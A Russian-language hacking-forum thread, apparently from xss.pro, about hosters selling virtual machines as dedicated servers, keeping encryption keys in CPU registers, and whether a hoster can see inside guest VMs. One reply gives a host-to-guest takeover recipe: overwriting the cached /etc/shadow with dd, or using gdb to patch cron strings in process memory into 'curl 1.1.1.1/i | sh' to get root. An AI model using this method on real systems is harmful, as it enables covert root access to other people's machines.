А есть же софт шифрования, который ключи или их части хранит в регистрах процессора и никогда в памяти. Названия не помню, но как бы можно и сделать и свои частные решения без хранения ключей в памяти.
SGX,TDX,SEV? https://xss.pro/threads/97855/А есть же софт шифрования, который ключи или их части хранит в регистрах процессора и никогда в памяти. Названия не помню, но как бы можно и сделать и свои частные решения без хранения ключей в памяти.
Нет. Я говорю о софтверных решениях. Представь что часть крипотования производистя без хранения ключей в ОЗУ, они хранятся в регистрах проца допустим r12 r13 r14 r15 или в DRx и в память они не попадают никогда.SGX,TDX,SEV? https://xss.pro/threads/97855/
Это отдельный вид торговцев.. Пользуйтесь только проверенными хостерами, и если критически важно чтобы железяка не была виртуалкой - спрашивайте в саппорте прямым текстоместь даже совсем обнаглевшие хостеры, которые продают виртуальную машину, а называют её "dedicated server", вот пример: https://www.homepageuniverse.com/servers/
другие хостеры тоже продают якобы "dedicated server", но на самом деле виртуалку - они запускают на выделенном сервере гипервизор (софт для управления виртуалками) и создают единственную виртуальную машину, выделяя ей почти все ресурсы сервера (оставляя минимальный кусочек процессора и оперативы для гипервизора), при этом клиенту доступ к гипервизору не выдают.
вот пример одного из таких говнохостеров (один из крупнейших хостингов в мире, кстати): https://www.hostgator.com/help/article/do-you-allow-kvm-on-a-dedicated-server
Если не затруднит, можешь посоветовать проверенных хостеров?Это отдельный вид торговцев.. Пользуйтесь только проверенными хостерами, и если критически важно чтобы железяка не была виртуалкой - спрашивайте в саппорте прямым текстом
Порекомендую себяЕсли не затруднит, можешь посоветовать проверенных хостеров?
безопасно только хоститься у себя на балконеЕсли не затруднит, можешь посоветовать проверенных хостеров?

можно одной ддшкой менять shadow , он кэшируется в памяти и ты спокойно можешь зайти если есть vnc или sshHost-to-guest code execution делается элементарно )
Ищете в памяти процесса /proc/pid/maps например следующие строки
run-parts /etc/cron.hourly
и заменяете на свой шелл скрипт, например curl 1.1.1.1/i | sh
Все можно сделать через gdb
Немного в логах намусорите, но сразу получите рута
теоретически можно шифровать виртуальную машину целиком: https://xss.pro/threads/97855/я могу ошибаться, но вроде как шифрование возможно только контейнера и то его нужно отключать, шифрование всей машины попросту бессмысленно так как хостер может делать слепок системы и если в этот момент пользователь был подключен то слепок идет в открытом виде... примерно такая же история с dpi его можно чуток прятать но толку мало(точнее еще меньше)...
спасибо, сейчас обязательно ознакомлюсь!!теоретически можно шифровать виртуальную машину целиком: https://xss.pro/threads/97855/
практически я до этого ещё не добрался, а форумчане тоже не особо спешат делиться опытом.